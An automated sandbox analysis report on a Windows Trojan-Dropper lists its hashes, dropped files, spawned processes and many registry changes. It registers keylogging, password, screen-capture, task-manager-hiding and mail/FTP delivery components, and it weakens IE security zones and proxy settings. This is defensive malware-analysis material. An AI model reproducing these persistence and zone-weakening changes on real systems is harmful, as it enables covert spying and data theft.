MD5: 2d16f4ed04491a623582712a9bdd9bb3
SHA1: 9b7285d5c289014e15027ce75bee7f57683b329f
SHA256: 16a63f41fc19c484a50ec2ce3108521365b97126e32b99d7b087c4b3765cad88
SSDeep: 3072:Nnj9jtfU INndIc0J55iVQ/L18a/Iwfx6BsGPsc8xU0X:NjbeiQQ/L18qIex6Kj5x
Size: 125440 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: ??? ??????????
Created at: 2004-08-04 09:01:37
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

SLIPI.exe:1988
Console.exe:1852
%original file name%.exe:1328

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SLIPI.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\KAWin\runaservice.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CONSOLE.ZIP (150349 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\conf.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Application Data\KAWin\core.dll (84642 bytes)
%Documents and Settings%\%current user%\Application Data\KAWin\conf.ini (2 bytes)
%Documents and Settings%\%current user%\Application Data\KAWin\service.ini (41 bytes)
%Documents and Settings%\%current user%\Application Data\KAWin\Console.exe (38103 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CONSOLE_201303[1].ZIP (307680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kadata_00 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CONSOLE.ZIP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kadata_00 (0 bytes)

The process Console.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\413818EE9DB253AE098C969051EFB68A (140 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\413818EE9DB253AE098C969051EFB68A (1 bytes)
%Documents and Settings%\All Users\Application Data\ConsoleLogs\2015-06-20.htm (687 bytes)
%Documents and Settings%\%current user%\Application Data\KAWin\conf.ini (2804 bytes)
%Documents and Settings%\All Users\Application Data\ConsoleLogs\tmpemail.htm (687 bytes)

The process %original file name%.exe:1328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\SLIPI.exe (2784 bytes)

Registry activity

The process SLIPI.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{014DF9C6-BF46-454C-8768-8180AFAD6B7C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}]
"(Default)" = "FTPDelivery Class"

[HKCR\Core.LLKeystrokes\CLSID]
"(Default)" = "{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}"

[HKCR\TypeLib\{1324FD68-BB6F-460D-9216-D5630DF9A3E8}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\CLSID\{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\Core.Application\CLSID]
"(Default)" = "{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}"

[HKCR\CLSID\{0889FC25-34E6-4C80-B06F-E4A793510A6C}\VersionIndependentProgID]
"(Default)" = "Core.Clipboard"

[HKCR\CLSID\{A137CC05-BA51-4985-9F71-74CC62EB0F82}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\Core.Parameters]
"(Default)" = "Parameters Class"

[HKCR\CLSID\{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\Core.HideTaskMan]
"(Default)" = "HideTaskMan Class"

[HKCR\Core.HideTaskMan\CLSID]
"(Default)" = "{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}"

[HKCR\Core.BlockExe.1]
"(Default)" = "BlockExe Class"

[HKCR\Core.Password.1\CLSID]
"(Default)" = "{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}"

[HKCR\CLSID\{6634D598-8116-47F7-A13F-64CD845EB837}\VersionIndependentProgID]
"(Default)" = "Core.BlockExe"

[HKCR\CLSID\{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\Core.Password]
"(Default)" = "Password Class"

[HKCR\CLSID\{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\Core.LLKeystrokes\CurVer]
"(Default)" = "Core.LLKeystrokes.1"

[HKCR\CLSID\{E2AAD69E-B950-4D68-8325-8F0428984309}\ProgID]
"(Default)" = "Core.Screen.1"

[HKCR\CLSID\{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}\ProgID]
"(Default)" = "Core.Password.1"

[HKCR\Core.Mouse.1]
"(Default)" = "Mouse Class"

[HKCR\CLSID\{80E91A0F-F577-4496-A842-0D77AE5B7802}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\Core.LLKeystrokes.1]
"(Default)" = "LLKeystrokes Class"

[HKCR\Core.Keystrokes\CLSID]
"(Default)" = "{547F04CB-6B00-494F-8710-2C6D36B744F3}"

[HKCR\CLSID\{547F04CB-6B00-494F-8710-2C6D36B744F3}\VersionIndependentProgID]
"(Default)" = "Core.Keystrokes"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCR\CLSID\{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}\VersionIndependentProgID]
"(Default)" = "Core.LLKeystrokes"

[HKCR\Core.Application.1]
"(Default)" = "Application Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCR\Core.PressEnter.1]
"(Default)" = "PressEnter Class"

[HKCR\Core.Clipboard]
"(Default)" = "Clipboard Class"

[HKCR\Core.RealBlockApp]
"(Default)" = "RealBlockApp Class"

[HKCR\Core.Clipboard\CLSID]
"(Default)" = "{0889FC25-34E6-4C80-B06F-E4A793510A6C}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Internet Explorer]
"iexplore.exe" = "Internet Explorer"

[HKCR\CLSID\{A137CC05-BA51-4985-9F71-74CC62EB0F82}\VersionIndependentProgID]
"(Default)" = "Core.Mouse"

[HKCR\Core.MailDelivery]
"(Default)" = "MailDelivery Class"

[HKCR\Core.Clipboard\CurVer]
"(Default)" = "Core.Clipboard.1"

[HKCR\CLSID\{338D130D-4375-4FFF-968A-64459E117CF6}\VersionIndependentProgID]
"(Default)" = "Core.Parameters"

[HKCR\Core.Screen\CLSID]
"(Default)" = "{E2AAD69E-B950-4D68-8325-8F0428984309}"

[HKCR\Core.VisitedWebsite\CurVer]
"(Default)" = "Core.VisitedWebsite.1"

[HKCR\CLSID\{A137CC05-BA51-4985-9F71-74CC62EB0F82}\ProgID]
"(Default)" = "Core.Mouse.1"

[HKCR\Core.RealBlockApp.1\CLSID]
"(Default)" = "{80E91A0F-F577-4496-A842-0D77AE5B7802}"

[HKCR\CLSID\{0889FC25-34E6-4C80-B06F-E4A793510A6C}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\CLSID\{014DF9C6-BF46-454C-8768-8180AFAD6B7C}\ProgID]
"(Default)" = "Core.MailDelivery.1"

[HKCR\CLSID\{547F04CB-6B00-494F-8710-2C6D36B744F3}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}]
"(Default)" = "LLKeystrokes Class"

[HKCR\Core.HideTaskMan.1\CLSID]
"(Default)" = "{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{338D130D-4375-4FFF-968A-64459E117CF6}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\CLSID\{DFCC2901-4794-46BF-BF8F-82E9C97703D8}\VersionIndependentProgID]
"(Default)" = "Core.PressEnter"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\CLSID\{80E91A0F-F577-4496-A842-0D77AE5B7802}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{E2AAD69E-B950-4D68-8325-8F0428984309}\VersionIndependentProgID]
"(Default)" = "Core.Screen"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{6634D598-8116-47F7-A13F-64CD845EB837}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\Core.FTPDelivery]
"(Default)" = "FTPDelivery Class"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\KAWin]
"Console.exe" = "Console"

[HKCR\CLSID\{338D130D-4375-4FFF-968A-64459E117CF6}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\Core.LLKeystrokes]
"(Default)" = "LLKeystrokes Class"

[HKCR\Core.Password\CLSID]
"(Default)" = "{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}"

[HKCR\Core.LLKeystrokes.1\CLSID]
"(Default)" = "{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}"

[HKCR\Core.Mouse\CurVer]
"(Default)" = "Core.Mouse.1"

[HKCR\CLSID\{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{547F04CB-6B00-494F-8710-2C6D36B744F3}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Core.Keystrokes]
"(Default)" = "Keystrokes Class"

[HKCR\Core.Parameters.1\CLSID]
"(Default)" = "{338D130D-4375-4FFF-968A-64459E117CF6}"

[HKCR\Core.Mouse]
"(Default)" = "Mouse Class"

[HKCR\Core.Clipboard.1\CLSID]
"(Default)" = "{0889FC25-34E6-4C80-B06F-E4A793510A6C}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Core.Screen\CurVer]
"(Default)" = "Core.Screen.1"

[HKCR\Core.Screen.1]
"(Default)" = "Screen Class"

[HKCR\Core.VisitedWebsite]
"(Default)" = "VisitedWebsite Class"

[HKCR\Core.Screen]
"(Default)" = "Screen Class"

[HKCR\Core.HideTaskMan\CurVer]
"(Default)" = "Core.HideTaskMan.1"

[HKCR\CLSID\{0889FC25-34E6-4C80-B06F-E4A793510A6C}\ProgID]
"(Default)" = "Core.Clipboard.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Core.MailDelivery\CLSID]
"(Default)" = "{014DF9C6-BF46-454C-8768-8180AFAD6B7C}"

[HKCR\Core.BlockExe.1\CLSID]
"(Default)" = "{6634D598-8116-47F7-A13F-64CD845EB837}"

[HKCR\CLSID\{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}\VersionIndependentProgID]
"(Default)" = "Core.VisitedWebsite"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 58 73 D3 7F F6 06 6B 9D F4 AA 8D C2 CC 99 5E"

[HKCR\Core.VisitedWebsite.1]
"(Default)" = "VisitedWebsite Class"

[HKCR\Core.Password.1]
"(Default)" = "Password Class"

[HKCR\CLSID\{6634D598-8116-47F7-A13F-64CD845EB837}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{6634D598-8116-47F7-A13F-64CD845EB837}\ProgID]
"(Default)" = "Core.BlockExe.1"

[HKCR\Core.Application\CurVer]
"(Default)" = "Core.Application.1"

[HKCR\Core.FTPDelivery\CurVer]
"(Default)" = "Core.FTPDelivery.1"

[HKCR\CLSID\{DFCC2901-4794-46BF-BF8F-82E9C97703D8}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{6634D598-8116-47F7-A13F-64CD845EB837}]
"(Default)" = "BlockExe Class"

[HKCR\Core.Parameters\CLSID]
"(Default)" = "{338D130D-4375-4FFF-968A-64459E117CF6}"

[HKCR\CLSID\{80E91A0F-F577-4496-A842-0D77AE5B7802}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{0889FC25-34E6-4C80-B06F-E4A793510A6C}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\Core.FTPDelivery.1\CLSID]
"(Default)" = "{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}"

[HKCR\CLSID\{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}\ProgID]
"(Default)" = "Core.LLKeystrokes.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\CLSID\{014DF9C6-BF46-454C-8768-8180AFAD6B7C}]
"(Default)" = "MailDelivery Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\TypeLib\{1324FD68-BB6F-460D-9216-D5630DF9A3E8}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}\VersionIndependentProgID]
"(Default)" = "Core.HideTaskMan"

[HKCR\CLSID\{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}\ProgID]
"(Default)" = "Core.VisitedWebsite.1"

[HKCR\Core.Application.1\CLSID]
"(Default)" = "{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}"

[HKCR\CLSID\{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}]
"(Default)" = "Application Class"

[HKCR\Core.PressEnter\CurVer]
"(Default)" = "Core.PressEnter.1"

[HKCR\CLSID\{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}\VersionIndependentProgID]
"(Default)" = "Core.FTPDelivery"

[HKCR\Core.VisitedWebsite\CLSID]
"(Default)" = "{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}"

[HKCR\Core.RealBlockApp.1]
"(Default)" = "RealBlockApp Class"

[HKCR\Core.Mouse.1\CLSID]
"(Default)" = "{A137CC05-BA51-4985-9F71-74CC62EB0F82}"

[HKCR\CLSID\{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{014DF9C6-BF46-454C-8768-8180AFAD6B7C}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{A137CC05-BA51-4985-9F71-74CC62EB0F82}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\CLSID\{E2AAD69E-B950-4D68-8325-8F0428984309}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Core.MailDelivery\CurVer]
"(Default)" = "Core.MailDelivery.1"

[HKCR\CLSID\{014DF9C6-BF46-454C-8768-8180AFAD6B7C}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{80E91A0F-F577-4496-A842-0D77AE5B7802}\VersionIndependentProgID]
"(Default)" = "Core.RealBlockApp"

[HKCR\Core.Clipboard.1]
"(Default)" = "Clipboard Class"

[HKCR\CLSID\{547F04CB-6B00-494F-8710-2C6D36B744F3}]
"(Default)" = "Keystrokes Class"

[HKCR\CLSID\{DFCC2901-4794-46BF-BF8F-82E9C97703D8}]
"(Default)" = "PressEnter Class"

[HKCR\CLSID\{338D130D-4375-4FFF-968A-64459E117CF6}\ProgID]
"(Default)" = "Core.Parameters.1"

[HKCR\Core.Screen.1\CLSID]
"(Default)" = "{E2AAD69E-B950-4D68-8325-8F0428984309}"

[HKCR\CLSID\{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}]
"(Default)" = "VisitedWebsite Class"

[HKCR\Core.BlockExe\CurVer]
"(Default)" = "Core.BlockExe.1"

[HKCR\Core.Parameters\CurVer]
"(Default)" = "Core.Parameters.1"

[HKCR\CLSID\{80E91A0F-F577-4496-A842-0D77AE5B7802}]
"(Default)" = "RealBlockApp Class"

[HKCR\Core.Mouse\CLSID]
"(Default)" = "{A137CC05-BA51-4985-9F71-74CC62EB0F82}"

[HKCR\CLSID\{338D130D-4375-4FFF-968A-64459E117CF6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{E2AAD69E-B950-4D68-8325-8F0428984309}]
"(Default)" = "Screen Class"

[HKCR\CLSID\{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}]
"(Default)" = "Password Class"

[HKCR\CLSID\{547F04CB-6B00-494F-8710-2C6D36B744F3}\ProgID]
"(Default)" = "Core.Keystrokes.1"

[HKCR\CLSID\{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}\VersionIndependentProgID]
"(Default)" = "Core.Application"

[HKCR\Core.MailDelivery.1\CLSID]
"(Default)" = "{014DF9C6-BF46-454C-8768-8180AFAD6B7C}"

[HKCR\CLSID\{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Core.RealBlockApp\CLSID]
"(Default)" = "{80E91A0F-F577-4496-A842-0D77AE5B7802}"

[HKCR\CLSID\{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Core.RealBlockApp\CurVer]
"(Default)" = "Core.RealBlockApp.1"

[HKCR\Core.Password\CurVer]
"(Default)" = "Core.Password.1"

[HKCR\Core.Keystrokes\CurVer]
"(Default)" = "Core.Keystrokes.1"

[HKCR\CLSID\{36ADC424-BDA5-4905-9DAB-7DF5BA8D5C14}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Core.Keystrokes.1]
"(Default)" = "Keystrokes Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\Core.MailDelivery.1]
"(Default)" = "MailDelivery Class"

[HKCR\Core.PressEnter]
"(Default)" = "PressEnter Class"

[HKCR\CLSID\{E2AAD69E-B950-4D68-8325-8F0428984309}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\TypeLib\{1324FD68-BB6F-460D-9216-D5630DF9A3E8}\1.0]
"(Default)" = "core 1.0 Type Library"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{DFCC2901-4794-46BF-BF8F-82E9C97703D8}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\Core.Parameters.1]
"(Default)" = "Parameters Class"

[HKCR\CLSID\{A137CC05-BA51-4985-9F71-74CC62EB0F82}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\CLSID\{85EB2DB4-7C29-4A6F-9AC1-B73FA8F1A069}\VersionIndependentProgID]
"(Default)" = "Core.Password"

[HKCR\CLSID\{E28D7EAB-5B23-4321-A2B1-A7064FFC07BA}\ProgID]
"(Default)" = "Core.Application.1"

[HKCR\CLSID\{80E91A0F-F577-4496-A842-0D77AE5B7802}\ProgID]
"(Default)" = "Core.RealBlockApp.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\CLSID\{338D130D-4375-4FFF-968A-64459E117CF6}]
"(Default)" = "Parameters Class"

[HKCR\Core.FTPDelivery.1]
"(Default)" = "FTPDelivery Class"

[HKCR\Core.BlockExe\CLSID]
"(Default)" = "{6634D598-8116-47F7-A13F-64CD845EB837}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}]
"(Default)" = "HideTaskMan Class"

[HKCR\CLSID\{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\CLSID\{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}\ProgID]
"(Default)" = "Core.HideTaskMan.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{6634D598-8116-47F7-A13F-64CD845EB837}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Core.PressEnter.1\CLSID]
"(Default)" = "{DFCC2901-4794-46BF-BF8F-82E9C97703D8}"

[HKCR\CLSID\{0889FC25-34E6-4C80-B06F-E4A793510A6C}]
"(Default)" = "Clipboard Class"

[HKCR\CLSID\{DFCC2901-4794-46BF-BF8F-82E9C97703D8}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Core.PressEnter\CLSID]
"(Default)" = "{DFCC2901-4794-46BF-BF8F-82E9C97703D8}"

[HKCR\CLSID\{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}\ProgID]
"(Default)" = "Core.FTPDelivery.1"

[HKCR\CLSID\{DFCC2901-4794-46BF-BF8F-82E9C97703D8}\ProgID]
"(Default)" = "Core.PressEnter.1"

[HKCR\CLSID\{0889FC25-34E6-4C80-B06F-E4A793510A6C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{547F04CB-6B00-494F-8710-2C6D36B744F3}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKCR\Core.Application]
"(Default)" = "Application Class"

[HKCR\CLSID\{E2AAD69E-B950-4D68-8325-8F0428984309}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{A137CC05-BA51-4985-9F71-74CC62EB0F82}]
"(Default)" = "Mouse Class"

[HKCR\Core.BlockExe]
"(Default)" = "BlockExe Class"

[HKCR\CLSID\{014DF9C6-BF46-454C-8768-8180AFAD6B7C}\VersionIndependentProgID]
"(Default)" = "Core.MailDelivery"

[HKCR\Core.VisitedWebsite.1\CLSID]
"(Default)" = "{9DCB81D0-6C41-4985-81B2-F6FD6EA1A9AA}"

[HKCR\CLSID\{D65F8159-4365-4D0C-9F76-EDF9E4AE98EE}\TypeLib]
"(Default)" = "{1324FD68-BB6F-460D-9216-D5630DF9A3E8}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\TypeLib\{1324FD68-BB6F-460D-9216-D5630DF9A3E8}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\KAWin\core.dll"

[HKCR\Core.Keystrokes.1\CLSID]
"(Default)" = "{547F04CB-6B00-494F-8710-2C6D36B744F3}"

[HKCR\Core.HideTaskMan.1]
"(Default)" = "HideTaskMan Class"

[HKCR\Core.FTPDelivery\CLSID]
"(Default)" = "{7FAF48EC-205B-4445-8DAF-02DAD6069F2A}"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Console.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 35 0A 0F 5E B8 84 A2 84 EC D6 2B 83 C2 5B 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
